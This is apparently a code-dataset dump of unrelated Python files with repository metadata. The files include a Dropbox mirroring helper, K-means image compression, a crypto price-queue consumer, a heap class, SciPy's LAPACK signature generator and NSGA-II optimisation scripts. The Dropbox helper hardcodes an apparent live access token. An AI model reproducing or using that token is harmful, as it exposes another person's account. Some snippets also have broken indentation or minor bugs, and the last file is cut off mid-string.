def Vin_Voltage(root, key, val, databaseHandle, mfgID, Sln, TestNameText, MinLimitText, MaxLimitText, MeasurementText, ResultText, modelFileContent, testStartTime, OperationMode, OperationModeInput, LotNumvberInput):
rawScale = popen('megaioind 0 ruin 3').read()
measurement = float(rawScale)
if measurement < float(val[1]) or measurement > float(val[2]) :
messagebox.showerror("Error", "Check if the bridge is Soldered \n \nSolder the bridge and press OK")
rawScale = popen('megaioind 0 ruin 3').read()
measurement = float(rawScale)
result = 'Pass' if measurement > float(val[1]) and measurement < float(val[2]) else 'Fail'
mod_TestName = re.sub(r"(\w)([A-Z])", r"\1 \2", key)
# Display Test and results
displayResult(TestNameText, MinLimitText, MaxLimitText, MeasurementText, ResultText, mod_TestName, val, measurement, result)
    # Return test result: True on pass, False on fail
    return result == "Pass"
|
[
"[email protected]"
] | |
cc6c7bd30039caf0625491719ee498eb3ca75398
|
d0a5f10d54bc336fba4c341c59297d8a75886c24
|
/dropbox_helper.py
|
8650f2f4a74b8c98decb7bac38f698325a8bf227
|
[] |
no_license
|
azabujuban/sleeping_pattern
|
89ca22d4a371de412bd96657157556c943786a49
|
ed3538804cdfe1c18f6f198e417a064c75c1bef1
|
refs/heads/master
| 2021-01-01T19:46:39.357136 | 2014-12-08T15:22:36 | 2014-12-08T15:22:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,500 |
py
|
__author__ = 'maxlevy'
from dropbox import client
import os
class DropboxHelper():
def __init__(self):
self.api_client = None
try:
access_token = 'qsEe-HKsKCEAAAAAAAAGVx_DNOVFQCrjtcsAEFNeTeenQ1NwKsis-51HZDpYjwG2'
self.api_client = client.DropboxClient(access_token)
except IOError:
pass # don't worry if it's not there
def mirror_tlog_files(self, remote_folder, local_folder):
"""
Copy file from Dropbox to local file and print out the metadata.
Examples:
Dropbox> get file.txt ~/dropbox-file.txt
"""
local_folder = os.path.expanduser(local_folder) + '/' + remote_folder.split('/')[-1:][0]
if not os.path.exists(local_folder):
os.makedirs(local_folder)
md = self.api_client.metadata(remote_folder)
tlog_folders = [_['path'] for _ in md['contents'] if _['is_dir'] and not 'Media' in _['path']]
for tlog_folder in tlog_folders:
print('Checking in', tlog_folder)
# step into that folder, adjust the local folder too
self.mirror_tlog_files(tlog_folder, local_folder + "/" + tlog_folder.split("/")[-1:][0])
tlog_paths = [_['path'] for _ in md['contents'] if 'TransactionLog' in _['path'][-len('TransactionLog0.tlog'):]]
for tlog_path in tlog_paths:
# if the size differs - copy it
remote_size = self.api_client.metadata(tlog_path)['bytes']
tlog_local_path = local_folder + '/' + tlog_path.split('/')[-1:][0]
local_size = os.path.getsize(tlog_local_path) if os.path.exists(tlog_local_path) else 0
if remote_size == local_size:
#print('Skipping copy for ', tlog_path.split('/')[-1:][0], '- the local copy has the same size: ', tlog_local_path)
continue
to_file = open(tlog_local_path, "wb")
f, metadata = self.api_client.get_file_and_metadata(tlog_path)
print('Copying ', tlog_path.split('/')[-1:][0], ' into ', tlog_local_path)
to_file.write(f.read())
def do_ls(self, path):
"""list files in current remote directory"""
resp = self.api_client.metadata(path)
images = []
if 'contents' in resp:
for f in resp['contents']:
name = os.path.basename(f['path'])
#encoding = locale.getdefaultlocale()[1] or 'ascii'
#self.stdout.write(('%s\n' % name).encode(encoding))
images.append(name)
return images
def get_shared_url(self, file_pathname):
url_short = self.do_share(file_pathname)
# will get you something like https://db.tt/0By6ntxQ
# now need to navigate there and take the real URL, someting like
# https://www.dropbox.com/s/7m2nt9baimhejac/430D98CA-2F75-45EF-ACA1-9837992E8F8B.jpg?dl=0
        import urllib.request  # bare 'import urllib' does not expose urllib.request
        page = urllib.request.urlopen(url_short)
url = page.geturl()
# now just get rid of the ?dl=0 parameter
from urllib.parse import urlparse
o = urlparse(url)
imgUrl = o.scheme + '://' + o.netloc + o.path
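        # Equivalent clean-up without string concatenation (a note, assuming
        # the same URL shape): urlunparse(urlparse(url)._replace(params='',
        # query='', fragment='')) from urllib.parse.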
return imgUrl
def do_share(self, path):
"""Create a link to share the file at the given path."""
return self.api_client.share(path)['url']
|
[
"[email protected]"
] | |
b8811aa2495584808df47112d19fab3fa7a3e441
|
952793f6d2444b1d8221cf584a5c629c54806f95
|
/kmeans.py
|
a6e4db68c23b70d2e34b0bed4a3426be000a2eac
|
[] |
no_license
|
scopegeneral/MiniProjects
|
24f57225e075e33ae05af036864e3ad21cbfe673
|
554cda16f03f1d94bb7380df4446146cde862aab
|
refs/heads/master
| 2020-03-23T09:49:59.835655 | 2018-07-21T05:02:45 | 2018-07-21T05:02:45 | 141,410,083 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,404 |
py
|
import numpy as np
import imageio
import matplotlib.pyplot as plt
def initKMeans(X, K):
[m, n] = X.shape
rand_idx = np.random.permutation(m)
rand_idx = rand_idx[:K]
centroids = X[rand_idx,:]
return centroids
def findClosestCentroids(X, initial_centroids):
[K, n] = initial_centroids.shape
[m, n] = X.shape
distances = np.zeros((m,K))
for i in range(K):
centroid_i = np.array([initial_centroids[i,:],]*m)
distances_i = (X - centroid_i)**2
distances[:,i] = distances_i.sum(axis = 1)
idx = np.argmin(distances,axis = 1)
return idx
def computeCentroids(X, idx, K):
[m, n] = X.shape
centroids = np.zeros((K,n))
for i in range(K):
group_i = X[idx == i,:]
centroids[i,:] = group_i.sum(axis = 0)/group_i.shape[0]
return centroids
if __name__ == "__main__":
A = imageio.imread(r"C:\Users\320004436\OneDrive - Philips\Desktop\Cp\test3.jpg")
A = A / 255
image_size = A.shape
A = np.reshape(A, (image_size[0]*image_size[1],3))
K = 16
max_iter = 10
centroids = initKMeans(A, K)
for i in range(max_iter):
print("K-Means Iteration {}/{}".format(i+1,max_iter))
idx = findClosestCentroids(A, centroids)
centroids = computeCentroids(A, idx, K)
A_compressed = centroids[idx,:]
A_compressed = np.reshape(A_compressed,(image_size[0],image_size[1],3))
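    # Optional diagnostic (not in the original script): mean squared distance
    # from each pixel to its assigned centroid, the usual K-means distortion.
    distortion = np.mean(np.sum((A - centroids[idx, :]) ** 2, axis=1))
    print("Final distortion: {:.6f}".format(distortion))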
plt.figure()
plt.imshow(A_compressed)
plt.show()
|
[
"[email protected]"
] | |
581d5e4892904165e00c1562bbdcc03dfe1ec4fc
|
ae1a91ba30fc82f1db484beca76fbb95ab835b2f
|
/apps/channel/management/commands/_archive/poll_queue.py
|
6beabbdeb682eddbb3f9ee8556cd7965a314c570
|
[] |
no_license
|
IntelligentTrading/clover
|
fa6728819e10c0357a5a3d5345581f6647bb1e68
|
84fa62eab4fd05ca6ee9fd966fc9981d5073ffd1
|
refs/heads/master
| 2022-10-15T23:20:11.849176 | 2019-07-17T14:09:54 | 2019-07-17T14:09:54 | 160,502,598 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,135 |
py
|
import json
import logging
import datetime
from django.core.management.base import BaseCommand
from django.db import IntegrityError
from apps.channel.incoming_queue import SqsListener
from apps.indicator.models import Price, Volume, PriceHistory
from taskapp.helpers.common import get_source_name
from settings import INCOMING_SQS_QUEUE, COUNTER_CURRENCY_CHOICES, BINANCE
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = "Polls price data from the incoming queue"
def handle(self, *args, **options):
logger.info("Getting ready to poll prices from the queue")
listener = SqsListener(INCOMING_SQS_QUEUE, wait_time=10)
listener.handler = process_message_from_queue
listener.listen()
# * Standard format
# symbols_info = [
# { 'source': 'poloniex',
# 'category': 'price', # or 'volume'
# 'symbol': 'BTC/USDT' # LTC/BTC
# 'value': 12345678,
# 'timestamp': 1522066118.23
# }, ...
# ]
def process_message_from_queue(message_body):
"Save SQS message to DB: Price, Volume and PriceHistory"
body_dict = json.loads(message_body)
subject = body_dict['Subject']
items = json.loads(body_dict['Message'])
#processed = []
for item in items:
# logger.debug(f"Save {item['category']} for {item['symbol']} from {item['source']}")
# source_code = next((code for code, source_text in SOURCE_CHOICES if source_text == item['source']), None)
source_code = BINANCE
        (transaction_currency, counter_currency_text) = item['symbol'].split('/')
        counter_currency_code = next((code for code, counter_currency in COUNTER_CURRENCY_CHOICES if counter_currency == counter_currency_text), None)
if None in (source_code, counter_currency_code):
continue # skip this source or counter_currency
if subject == 'prices_volumes' and item['category'] == 'price':
try:
price = int(float(item['value']) * 10 ** 8) # convert to satoshi
Price.objects.create(
source=source_code,
transaction_currency=transaction_currency,
counter_currency=counter_currency_code,
price=price,
timestamp=item['timestamp']
)
#processed.append("{}/{}".format(transaction_currency, counter_currency_code))
# logger.debug(">>> Price saved: source={}, transaction_currency={}, counter_currency={}, price={}, timestamp={}".format(
# source_code, transaction_currency, counter_currency_code, price, item['timestamp']))
except Exception as e:
logger.debug(f">>>> Error saving Price for {item['symbol']} from: {item['source']}. {e}")
elif subject == 'prices_volumes' and item['category'] == 'volume':
try:
volume = float(item['value'])
Volume.objects.create(
source=source_code,
transaction_currency=transaction_currency,
counter_currency=counter_currency_code,
volume=volume,
timestamp=item['timestamp']
)
# logger.debug(">>> Volume saved: source={}, transaction_currency={}, counter_currency={}, volume={}, timestamp={}".format(
# source_code, transaction_currency, counter_currency_code, volume, item['timestamp']))
except Exception as e:
logger.debug(f">>>> Error saving Volume for {item['symbol']} from: {item['source']}. {e}")
elif subject == 'ohlc_prices':
try:
PriceHistory.objects.create(
source=source_code,
transaction_currency=transaction_currency,
counter_currency=counter_currency_code,
open_p=to_satoshi(item['popen']),
high=to_satoshi(item['high']),
low=to_satoshi(item['low']),
close=to_satoshi(item['close']),
timestamp=datetime.datetime.utcfromtimestamp(item['timestamp']),
volume=get_volume(item['bvolume'])
)
except IntegrityError as e:
pass
# logger.debug(f">>> Dublicated record for PriceHistory.\n{e}")
except Exception as e:
logger.debug(f">>>> Error saving PriceHistory for {item['symbol']} from: {item['source']}. {e}")
#logger.debug(f">>> OHLC history price saved. Source:{source_code}, {transaction_currency}_{counter_currency_code}")
#logger.debug("Message for {} saved to db. Coins: {}".format(get_source_name(source_code), ",".join(processed)))
logger.info(f"Message for {get_source_name(source_code)} ({subject}) saved to db")
# Little helpers
def to_satoshi(value):
try:
return int(float(value) * 10 ** 8)
except:
return None
def get_volume(value):
try:
return float(value)
except:
return None
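# e.g. to_satoshi('1.5') == 150000000 and to_satoshi('n/a') is None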
|
[
"[email protected]"
] | |
dfb7a671ee5633e18c11d844bae922e69660677e
|
ca5339f667a5ef6a9faa149413d836cd3c1bb069
|
/heap.py
|
4436234f9e4cb9351b57f92847cf108f80802aff
|
[] |
no_license
|
alanlyyy/PythonHeaps
|
47b2baed57344d5e75328b55dfd3ae9b9d968e76
|
9732b45fb939d5538a3529d379953572ebc7f1af
|
refs/heads/master
| 2020-09-14T09:41:45.597355 | 2019-11-21T05:17:33 | 2019-11-21T05:17:33 | 223,093,523 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,418 |
py
|
#max number of items that can be stored in the heap
CAPACITY = 8
class HeapBase:
def __init__(self):
#create an array with capacity elements
self.heap = [0]*CAPACITY
#counter to keep track of num items in heap
self.heap_size = 0
    # O(logN): we must make sure the heap properties are not violated
def insert(self, item):
#if capacity is reached don't insert any more items
if CAPACITY == self.heap_size:
return
#insert the item + increment the counter
self.heap[self.heap_size] = item
self.heap_size += 1
#1. insert item to last position of array
#2. Validate heap properties are not violated
self.upHeap(self.heap_size-1)
#O(logN)
def upHeap(self, index):
"""check if node meets heap properties, otherwise swap nodes until the heap properties are met
going up the tree. (upheap)
"""
#get the parent index
parent_index = (index-1)//2 #integer division
        # recurse upward until the root is reached or the parent is no smaller
        if index > 0 and self.heap[index] > self.heap[parent_index]:
#swap parent and child node
self.swap(index,parent_index)
#recursively go up the tree
self.upHeap(parent_index)
def swap(self, index1, index2):
self.heap[index2], self.heap[index1] = self.heap[index1], self.heap[index2]
#O(1)
def get_max(self):
#return the root node
return self.heap[0]
#O(logN)
def removeMax(self):
"""Return the max item + removes it from the heap.
Check if node is in correct position not violating heap properties.
"""
max = self.get_max()
#swap last element with root node
self.swap(0,self.heap_size-1)
#update the size
self.heap_size = self.heap_size - 1
#move the root node down the heap to not violate heap properties.
self.downHeap(0)
return max
def downHeap(self, index):
"""From the root node, swap the parent node with its children if
        child nodes are larger than the parent node, to ensure heap properties are met.
"""
index_left = 2*index + 1
index_right = 2*index + 2
#max heap parent node is greater than child node
index_largest = index
#while heap is within size of array and left index is greater than parent node
if index_left < self.heap_size and self.heap[index_left] > self.heap[index]:
index_largest = index_left
#check if the right child is greater then the left child: largest is right node
if index_right < self.heap_size and self.heap[index_right] > self.heap[index_largest]:
index_largest = index_right
if index != index_largest:
#swap the parent node with child node
self.swap(index,index_largest)
#go down the heap with largest node
self.downHeap(index_largest)
def heap_sort(self):
"""Sort N nodes in heap.
Every removeMax operation called takes O(logN) because of downHeap()
Complete running time: O(N*logN)
"""
tempList = []
#store size of heap
size = self.heap_size
for i in range(0,size):
#call removeMax N times to return max element and remove max every iteration
max = self.removeMax()
tempList.append(max)
#print(max._key,max._value,max._price)
for i in range(0,size):
self.insert(tempList[i])
if __name__ == '__main__':
heap = HeapBase()
heap.insert(10)
heap.insert(8)
heap.insert(12)
heap.insert(20)
heap.insert(-2)
heap.insert(0)
heap.insert(1)
heap.insert(321)
heap.heap_sort()
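    # Sanity check (hypothetical, not part of the original lab code):
    # heap_sort() re-inserts every item, so repeated removeMax() must
    # yield the items in descending order.
    expected = sorted([10, 8, 12, 20, -2, 0, 1, 321], reverse=True)
    extracted = [heap.removeMax() for _ in range(heap.heap_size)]
    assert extracted == expected, (extracted, expected)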
|
[
"[email protected]"
] | |
cec69055122f7d6681aafa3340f9b1e6c99ab682
|
999879f8d18e041d7fa313132408b252aded47f8
|
/01-codes/scipy-master/scipy/linalg/_cython_signature_generator.py
|
3e32f4ee3bff69c241712515ab32a5fa027911ff
|
[
"MIT"
] |
permissive
|
QPanProjects/Surrogate-Model
|
ebcaf05728e82dcbcd924c2edca1b490ab085173
|
848c7128201218b0819c9665e2cec72e3b1d29ac
|
refs/heads/master
| 2022-10-11T19:03:55.224257 | 2020-06-09T14:37:35 | 2020-06-09T14:37:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,372 |
py
|
"""
A script that uses f2py to generate the signature files used to make
the Cython BLAS and LAPACK wrappers from the fortran source code for
LAPACK and the reference BLAS.
To generate the BLAS wrapper signatures call:
python _cython_signature_generator.py blas <blas_directory> <out_file>
To generate the LAPACK wrapper signatures call:
python _cython_signature_generator.py lapack <lapack_src_directory> <out_file>
"""
import glob
from numpy.f2py import crackfortran
sig_types = {'integer': 'int',
'complex': 'c',
'double precision': 'd',
'real': 's',
'complex*16': 'z',
'double complex': 'z',
'character': 'char',
'logical': 'bint'}
def get_type(info, arg):
argtype = sig_types[info['vars'][arg]['typespec']]
if argtype == 'c' and info['vars'][arg].get('kindselector') is not None:
argtype = 'z'
return argtype
def make_signature(filename):
info = crackfortran.crackfortran(filename)[0]
name = info['name']
if info['block'] == 'subroutine':
return_type = 'void'
else:
return_type = get_type(info, name)
arglist = [' *'.join([get_type(info, arg), arg]) for arg in info['args']]
args = ', '.join(arglist)
# Eliminate strange variable naming that replaces rank with rank_bn.
args = args.replace('rank_bn', 'rank')
return '{0} {1}({2})\n'.format(return_type, name, args)
def get_sig_name(line):
return line.split('(')[0].split(' ')[-1]
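# e.g. get_sig_name('void daxpy(int *n, d *da, d *dx, int *incx, d *dy, int *incy)\n')
# returns 'daxpy'.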
def sigs_from_dir(directory, outfile, manual_wrappers=None, exclusions=None):
if directory[-1] in ['/', '\\']:
directory = directory[:-1]
files = glob.glob(directory + '/*.f*')
if exclusions is None:
exclusions = []
if manual_wrappers is not None:
exclusions += [get_sig_name(l) for l in manual_wrappers.split('\n')]
signatures = []
for filename in files:
name = filename.split('\\')[-1][:-2]
if name in exclusions:
continue
signatures.append(make_signature(filename))
if manual_wrappers is not None:
signatures += [l + '\n' for l in manual_wrappers.split('\n')]
signatures.sort(key=get_sig_name)
comment = ["# This file was generated by _cython_wrapper_generators.py.\n",
"# Do not edit this file directly.\n\n"]
with open(outfile, 'w') as f:
f.writelines(comment)
f.writelines(signatures)
# The signature that is used for zcgesv in lapack 3.1.0 and 3.1.1 changed
# in version 3.2.0. The version included in the clapack on OSX has the
# more recent signature though.
# slamch and dlamch are not in the lapack src directory, but,since they
# already have Python wrappers, we'll wrap them as well.
# The other manual signatures are used because the signature generating
# functions don't work when function pointer arguments are used.
lapack_manual_wrappers = '''void cgees(char *jobvs, char *sort, cselect1 *select, int *n, c *a, int *lda, int *sdim, c *w, c *vs, int *ldvs, c *work, int *lwork, s *rwork, bint *bwork, int *info)
void cgeesx(char *jobvs, char *sort, cselect1 *select, char *sense, int *n, c *a, int *lda, int *sdim, c *w, c *vs, int *ldvs, s *rconde, s *rcondv, c *work, int *lwork, s *rwork, bint *bwork, int *info)
void cgges(char *jobvsl, char *jobvsr, char *sort, cselect2 *selctg, int *n, c *a, int *lda, c *b, int *ldb, int *sdim, c *alpha, c *beta, c *vsl, int *ldvsl, c *vsr, int *ldvsr, c *work, int *lwork, s *rwork, bint *bwork, int *info)
void cggesx(char *jobvsl, char *jobvsr, char *sort, cselect2 *selctg, char *sense, int *n, c *a, int *lda, c *b, int *ldb, int *sdim, c *alpha, c *beta, c *vsl, int *ldvsl, c *vsr, int *ldvsr, s *rconde, s *rcondv, c *work, int *lwork, s *rwork, int *iwork, int *liwork, bint *bwork, int *info)
void dgees(char *jobvs, char *sort, dselect2 *select, int *n, d *a, int *lda, int *sdim, d *wr, d *wi, d *vs, int *ldvs, d *work, int *lwork, bint *bwork, int *info)
void dgeesx(char *jobvs, char *sort, dselect2 *select, char *sense, int *n, d *a, int *lda, int *sdim, d *wr, d *wi, d *vs, int *ldvs, d *rconde, d *rcondv, d *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info)
void dgges(char *jobvsl, char *jobvsr, char *sort, dselect3 *selctg, int *n, d *a, int *lda, d *b, int *ldb, int *sdim, d *alphar, d *alphai, d *beta, d *vsl, int *ldvsl, d *vsr, int *ldvsr, d *work, int *lwork, bint *bwork, int *info)
void dggesx(char *jobvsl, char *jobvsr, char *sort, dselect3 *selctg, char *sense, int *n, d *a, int *lda, d *b, int *ldb, int *sdim, d *alphar, d *alphai, d *beta, d *vsl, int *ldvsl, d *vsr, int *ldvsr, d *rconde, d *rcondv, d *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info)
d dlamch(char *cmach)
void ilaver(int *vers_major, int *vers_minor, int *vers_patch)
void sgees(char *jobvs, char *sort, sselect2 *select, int *n, s *a, int *lda, int *sdim, s *wr, s *wi, s *vs, int *ldvs, s *work, int *lwork, bint *bwork, int *info)
void sgeesx(char *jobvs, char *sort, sselect2 *select, char *sense, int *n, s *a, int *lda, int *sdim, s *wr, s *wi, s *vs, int *ldvs, s *rconde, s *rcondv, s *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info)
void sgges(char *jobvsl, char *jobvsr, char *sort, sselect3 *selctg, int *n, s *a, int *lda, s *b, int *ldb, int *sdim, s *alphar, s *alphai, s *beta, s *vsl, int *ldvsl, s *vsr, int *ldvsr, s *work, int *lwork, bint *bwork, int *info)
void sggesx(char *jobvsl, char *jobvsr, char *sort, sselect3 *selctg, char *sense, int *n, s *a, int *lda, s *b, int *ldb, int *sdim, s *alphar, s *alphai, s *beta, s *vsl, int *ldvsl, s *vsr, int *ldvsr, s *rconde, s *rcondv, s *work, int *lwork, int *iwork, int *liwork, bint *bwork, int *info)
s slamch(char *cmach)
void zgees(char *jobvs, char *sort, zselect1 *select, int *n, z *a, int *lda, int *sdim, z *w, z *vs, int *ldvs, z *work, int *lwork, d *rwork, bint *bwork, int *info)
void zgeesx(char *jobvs, char *sort, zselect1 *select, char *sense, int *n, z *a, int *lda, int *sdim, z *w, z *vs, int *ldvs, d *rconde, d *rcondv, z *work, int *lwork, d *rwork, bint *bwork, int *info)
void zgges(char *jobvsl, char *jobvsr, char *sort, zselect2 *selctg, int *n, z *a, int *lda, z *b, int *ldb, int *sdim, z *alpha, z *beta, z *vsl, int *ldvsl, z *vsr, int *ldvsr, z *work, int *lwork, d *rwork, bint *bwork, int *info)
void zggesx(char *jobvsl, char *jobvsr, char *sort, zselect2 *selctg, char *sense, int *n, z *a, int *lda, z *b, int *ldb, int *sdim, z *alpha, z *beta, z *vsl, int *ldvsl, z *vsr, int *ldvsr, d *rconde, d *rcondv, z *work, int *lwork, d *rwork, int *iwork, int *liwork, bint *bwork, int *info)'''
if __name__ == '__main__':
from sys import argv
libname, src_dir, outfile = argv[1:]
# Exclude scabs and sisnan since they aren't currently included
# in the scipy-specific ABI wrappers.
if libname.lower() == 'blas':
sigs_from_dir(src_dir, outfile, exclusions=['scabs1', 'xerbla'])
elif libname.lower() == 'lapack':
# Exclude all routines that do not have consistent interfaces from
# LAPACK 3.1.0 through 3.6.0.
# Also exclude routines with string arguments to avoid
# compatibility woes with different standards for string arguments.
# Exclude sisnan and slaneg since they aren't currently included in
# The ABI compatibility wrappers.
exclusions = ['sisnan', 'csrot', 'zdrot', 'ilaenv', 'iparmq', 'lsamen',
'xerbla', 'zcgesv', 'dlaisnan', 'slaisnan', 'dlazq3',
'dlazq4', 'slazq3', 'slazq4', 'dlasq3', 'dlasq4',
'slasq3', 'slasq4', 'dlasq5', 'slasq5', 'slaneg',
# Routines deprecated in LAPACK 3.6.0
'cgegs', 'cgegv', 'cgelsx', 'cgeqpf', 'cggsvd', 'cggsvp',
'clahrd', 'clatzm', 'ctzrqf', 'dgegs', 'dgegv', 'dgelsx',
'dgeqpf', 'dggsvd', 'dggsvp', 'dlahrd', 'dlatzm', 'dtzrqf',
'sgegs', 'sgegv', 'sgelsx', 'sgeqpf', 'sggsvd', 'sggsvp',
'slahrd', 'slatzm', 'stzrqf', 'zgegs', 'zgegv', 'zgelsx',
'zgeqpf', 'zggsvd', 'zggsvp', 'zlahrd', 'zlatzm', 'ztzrqf']
sigs_from_dir(src_dir, outfile, manual_wrappers=lapack_manual_wrappers,
exclusions=exclusions)
|
[
"[email protected]"
] | |
8458f4465852fe16d436942d35b6d77d1c651164
|
706f13fdcf9661040158a9effbfdf5a93ca95ac9
|
/app9.py
|
ca3e3fca0ccdb34a8f7f8eded59d6a328f50f27b
|
[] |
no_license
|
123shukla/samy-web
|
200eb47dca17a810bfc1474e0cfcefad54930d2a
|
6d0fe06db54d19201a30e30c3c819ab6340bafcf
|
refs/heads/main
| 2022-12-29T05:40:28.982799 | 2020-10-13T07:31:05 | 2020-10-13T07:31:05 | 303,619,403 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 380 |
py
|
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from app import app
layout = html.Div([
html.H3('Node 9'),
dcc.Link('Go to Node 2', href='/apps/app2'),
html.Br(),
dcc.Link('Go to Node 15', href='/apps/app15'),
html.Br(),
dcc.Link('Go to Node 10', href='/apps/app10'),
])
|
[
"[email protected]"
] | |
c1749a91a063e221eaf223f62ef9141b352ea7b7
|
39fbbfd88540111850c4591e70f1dd35d4ca4634
|
/test-nsga2.py
|
ab530f516329acf77ef053a20130c5cb740c5093
|
[] |
no_license
|
Robert-MYM/Nuaa_ASE-Project_one
|
7166f2cc0e0886491fc1e9e22ab0f648fd538498
|
cc2a7e81b759b5f8f15f5d1c55e0f82375f76cb9
|
refs/heads/master
| 2020-06-01T02:14:33.083619 | 2019-06-11T08:57:36 | 2019-06-11T08:57:36 | 190,593,327 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,033 |
py
|
from jmetal.algorithm.multiobjective.nsgaii import NSGAII
from jmetal.operator import BinaryTournamentSelection, BitFlipMutation, SPXCrossover,PolynomialMutation,SBXCrossover
from jmetal.problem.multiobjective.unconstrained import OneZeroMax
from jmetal.util.comparator import RankingAndCrowdingDistanceComparator, DominanceComparator
from jmetal.util.observer import ProgressBarObserver, VisualizerObserver
from jmetal.util.solution_list import print_function_values_to_file, print_variables_to_file
from jmetal.util.termination_criterion import StoppingByEvaluations
import ZDT1,DTLZ1,HRES
if __name__ == '__main__':
#binary_string_length = 512
#problem = OneZeroMax(binary_string_length)
#problem = ZDT1.ZDT1()
problem = HRES.HRES()
max_evaluations = 50000
algorithm = NSGAII(
problem=problem,
population_size=100,
offspring_population_size=100,
#mutation=BitFlipMutation(probability=1.0 / binary_string_length),
mutation=PolynomialMutation(probability=1.0/problem.number_of_variables,distribution_index=20),
#crossover=SPXCrossover(probability=1.0),
crossover=SBXCrossover(probability=1.0,distribution_index=20),
selection=BinaryTournamentSelection(comparator=RankingAndCrowdingDistanceComparator()),
termination_criterion=StoppingByEvaluations(max=max_evaluations),
#dominance_comparator=DominanceComparator()
)
algorithm.observable.register(observer=ProgressBarObserver(max=max_evaluations))
algorithm.observable.register(observer=VisualizerObserver())
algorithm.run()
front = algorithm.get_result()
# Save results to file
print_function_values_to_file(front, 'FUN.' + algorithm.get_name() + "-" + problem.get_name())
print_variables_to_file(front, 'VAR.' + algorithm.get_name() + "-" + problem.get_name())
print('Algorithm (continuous problem): ' + algorithm.get_name())
print('Problem: ' + problem.get_name())
print('Computing time: ' + str(algorithm.total_computing_time))
|
[
"[email protected]"
] | |
03bf0178032d170f8e311d11f4a3aa46d2dc98ba
|
caae8bec3b48d2805c2b1bd9db053026bf78d074
|
/tests/test.py
|
fb364def5456abb9fb01ce116e5a44365e35131e
|
[
"MIT"
] |
permissive
|
worldwidekatie/study_guide
|
69ccbeaef7c5a6ce5fbeffa7b115d20dfe42a843
|
bc7a67f331990d07463c6ac9413eef283e555ad0
|
refs/heads/master
| 2022-06-19T14:14:54.225242 | 2020-05-07T22:58:16 | 2020-05-07T22:58:16 | 262,132,903 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 220 |
py
|
import unittest
from ..my_studyguide.math1 import Math1
class Math1Tests(unittest.TestCase):
def test_addition(self):
self.assertEqual(Math1.addition, 30)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
97f76feb72609a46af6c644c9ed643b1a6dd4f6f
|
8e2648e3ec0f777ba47f0688e455f2a997e1da05
|
/com/shujia/day1/demo5.py
|
1e20db33ef2e7956f9d5c154dd5b094d7174ec61
|
[] |
no_license
|
MLlibfiy/python
|
c3ac27e81943bc669624198b6ac9c753c067f054
|
1d088bf3f9111185001230de0ee06bc760dc8ae8
|
refs/heads/master
| 2020-04-13T03:52:46.129152 | 2018-12-29T02:48:26 | 2018-12-29T02:48:26 | 162,944,627 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 468 |
py
|
# coding=utf-8
if __name__ == '__main__':
    # set: unordered; elements are unique (duplicates are dropped)
set1 = {"shu", "jia", 1, "a", "a"}
print set1
    # create an empty set ({} would create a dict)
set2 = set()
set2.add("java")
set2.add("java")
set2.add("java")
set2.add("scala")
print set2
set4 = {1, 2, 3, 4, 5, 6}
set5 = {4, 5, 6, 7, 8, 9}
    print set4 | set5  # union
    print set4 & set5  # intersection
    print set4 - set5  # difference
    print set4 ^ set5  # symmetric difference
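    # Expected results for set4 = {1..6} and set5 = {4..9}:
    # union -> {1,...,9}; intersection -> {4, 5, 6};
    # difference -> {1, 2, 3}; symmetric difference -> {1, 2, 3, 7, 8, 9}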
|
[
"[email protected]"
] | |
03e0224bd1d127b915a20878ed3192e0ad6658fd
|
904a13bb38e8f73dba4081becf41dbeea0ea21d5
|
/scripts/export_titers_for_auspice_v1.py
|
7b6c15cbf368f005a93b86cad9cf35d61656706e
|
[] |
no_license
|
nextstrain/seasonal-flu
|
a78bc645d5dc4e1c73b5acdb7e2ddd9ea8f88f19
|
48a0ed2aecb6ea16b2483f136f718c618fdfd1e7
|
refs/heads/master
| 2023-08-04T06:31:08.278580 | 2023-08-01T18:56:29 | 2023-08-01T18:56:29 | 154,029,525 | 35 | 20 | null | 2023-09-08T22:19:40 | 2018-10-21T16:36:00 |
Python
|
UTF-8
|
Python
| false | false | 1,193 |
py
|
#!/usr/bin/env python3
import argparse
import json
if __name__ == '__main__':
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--titers-sub")
parser.add_argument("--titers-tree")
parser.add_argument("--output-titers")
parser.add_argument("--output-titers-sub")
parser.add_argument("--output-titers-tree")
args = parser.parse_args()
with open(args.titers_sub) as fh:
sub = json.load(fh)
with open(args.output_titers_sub, 'wt') as sub_file:
json.dump({'avidity': sub['avidity'],
'potency': sub['potency'],
'substitution': sub['substitution']},
sub_file, indent=1)
with open(args.output_titers, 'wt') as raw_file:
json.dump(sub['titers'], raw_file, indent=1)
with open(args.titers_tree) as fh:
tree = json.load(fh)
with open(args.output_titers_tree, 'wt') as tree_file:
json.dump({'avidity': tree['avidity'],
'potency': tree['potency'],
'dTiter': {k:v['dTiter'] for k,v in tree['nodes'].items()}},
tree_file, indent=1)
|
[
"[email protected]"
] | |
efc9f072d5d8de144abc02d994905ccb7de0c700
|
db3981b8d30db9ec0e3ee8242ed918a7c5988aa1
|
/AlgoDescription.py
|
7908a1dec8a3dfde8cd874ba98bc226dc031c26d
|
[] |
no_license
|
nigamv/datasciencetool
|
eebacbd412a2febad87bbf2848127137519431a4
|
b70c9446a8f9c41a3e1dc257bb8633e3f5737ff6
|
refs/heads/master
| 2020-03-29T13:01:07.500757 | 2019-05-29T20:37:55 | 2019-05-29T20:37:55 | 149,935,719 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 370 |
py
|
'''
Created on Feb 11, 2016
@author: vibhor
'''
class AlgoDescription:
algorithms =("There are various algorithms available for processing data and getting desired outputs."
"These algorithms are divided in two different ways, supervised and un-supervised learning algorithm "
